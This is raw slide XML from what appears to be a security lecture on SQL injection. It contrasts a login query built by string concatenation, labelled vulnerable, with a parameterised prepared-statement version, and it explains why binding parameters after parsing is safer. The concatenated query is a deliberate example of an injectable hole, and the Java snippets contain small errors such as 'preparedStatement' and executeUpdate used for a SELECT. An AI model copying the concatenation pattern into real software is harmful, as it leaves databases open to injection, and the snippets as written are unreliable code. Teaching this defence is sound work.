            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM Account WHERE Username = " + $username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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33" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ "AND Password = " + $password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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endParaRPr lang="en-GB" altLang="nl-NL" sz="1633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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>give a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string with placeholders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  as separate inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="10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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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33" b="1" dirty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en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM Account WHERE Username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> AND Password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1633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33" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1633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buNone/>
              <a:tabLst>
                <a:tab pos="342725" algn="l"/>
                <a:tab pos="455047" algn="l"/>
                <a:tab pos="911534" algn="l"/>
                <a:tab pos="1369461" algn="l"/>
                <a:tab pos="1825947" algn="l"/>
                <a:tab pos="2283874" algn="l"/>
                <a:tab pos="2740361" algn="l"/>
                <a:tab pos="3198288" algn="l"/>
                <a:tab pos="3654774" algn="l"/>
                <a:tab pos="4112701" algn="l"/>
                <a:tab pos="4569188" algn="l"/>
                <a:tab pos="5025674" algn="l"/>
                <a:tab pos="5483601" algn="l"/>
                <a:tab pos="5940088" algn="l"/>
                <a:tab pos="6398015" algn="l"/>
                <a:tab pos="6854501" algn="l"/>
                <a:tab pos="7312428" algn="l"/>
                <a:tab pos="7768915" algn="l"/>
                <a:tab pos="8226842" algn="l"/>
                <a:tab pos="8683328" algn="l"/>
                <a:tab pos="9141255" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password   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340" indent="-228577" defTabSz="492074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492" indent="-228577" defTabSz="492074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8645" indent="-228577" defTabSz="492074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5797" indent="-228577" defTabSz="492074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fld id="{7EAD3E82-A49F-41B4-8E03-BFC3A5A66C5A}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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  <a:defRPr/>
              </a:pPr>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1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02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276225"/>
            <a:ext cx="8280920" cy="9921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nl-NL" dirty="0" smtClean="0"/>
              <a:t>Prepared statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>parameterised queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code vulnerable to SQL injection, using so-called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ynamic SQL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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  String 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updateString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 =                        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   "SELECT * FROM Account WHERE Username" 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    + username + "AND Password =" + password;                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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 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stmt.executeUpdate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(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updateString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);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0" smtClean="0"/>
              <a:t>    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 smtClean="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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  vulnerable to SQL injection using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prepared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tatements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="18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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement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 login = 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con.preparedStatement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("SELECT * FROM Account   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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          WHERE Username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?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 AND Password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?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" );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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  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login.setString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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1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, username); 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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  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login.setString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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2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, password);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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  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login.executeUpdate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();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fld id="{DB0AD151-D672-4349-B612-52B3593EB3DE}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F070403050403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12304" y="5278771"/>
            <a:ext cx="162984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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind variable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 flipV="1">
            <a:off x="3690276" y="4893891"/>
            <a:ext cx="1876076" cy="38488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79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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>idea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behind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parameterised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queries</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" dirty="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85800" y="3847729"/>
            <a:ext cx="7761288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altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With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dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL, parameters are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substituted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> query string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and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then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the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result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is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parsed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;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processed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean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nl-NL" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> query is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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and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then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parameters are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>substituted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>afterwards</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean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</a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The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substitution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then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becomes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</a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty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dangerous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, as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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> impact on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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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meaning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reduced</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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C6B24DE-B380-4D55-81D6-B325C89FE1A8}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62469" name="Group 34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1108701" y="1293129"/>
            <a:ext cx="6537964" cy="2395670"/>
            <a:chOff x="822884" y="1769321"/>
            <a:chExt cx="6537141" cy="3177141"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62470" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="822884" y="1769321"/>
              <a:ext cx="4457711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nl-NL" altLang="nl-NL" sz="1800" b="1" dirty="0" smtClean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SELECT </a:t>
              </a:r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... FROM ... </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" dirty="0" smtClean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WHERE </a:t>
              </a:r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...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62471" name="TextBox 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2770800" y="2677502"/>
              <a:ext cx="1287370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Accounts</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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2472" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4682429" y="2725181"/>
              <a:ext cx="598166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AND</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL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473" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2024844" y="2735899"/>
              <a:ext cx="3385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20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  <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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2474" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3284564" y="3583456"/>
              <a:ext cx="338511" cy="53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20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endParaRPr lang="nl-NL" altLang="nl-NL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408018" y="3888608"/>
              <a:ext cx="607935" cy="476142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328654" y="3050599"/>
              <a:ext cx="609523" cy="477728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603258" y="3060121"/>
              <a:ext cx="1112698" cy="587241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3360316" y="2153742"/>
              <a:ext cx="14285" cy="557085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4992896" y="2222185"/>
              <a:ext cx="12698" cy="557085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188919" y="2169681"/>
              <a:ext cx="14286" cy="555499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481" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6012147" y="3505961"/>
              <a:ext cx="338511" cy="53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20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endParaRPr lang="nl-NL" altLang="nl-NL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482" name="TextBox 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1458905" y="4456653"/>
              <a:ext cx="1287370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Username</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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2483" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5055535" y="4439016"/>
              <a:ext cx="1011688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 err="1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Passwd</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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204847" y="3915589"/>
              <a:ext cx="1112697" cy="587241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454050" y="3888608"/>
              <a:ext cx="571428" cy="515820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690560" y="3947332"/>
              <a:ext cx="396825" cy="457096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487" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4034422" y="4442884"/>
              <a:ext cx="460324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$1</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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2488" name="TextBox 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6899701" y="4428618"/>
              <a:ext cx="460324" cy="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800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="3399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$2</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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1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Similar mechanisms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 smtClean="0"/>
              <a:t>For SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> database systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/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stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>may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be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> safe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, but details </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>depend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
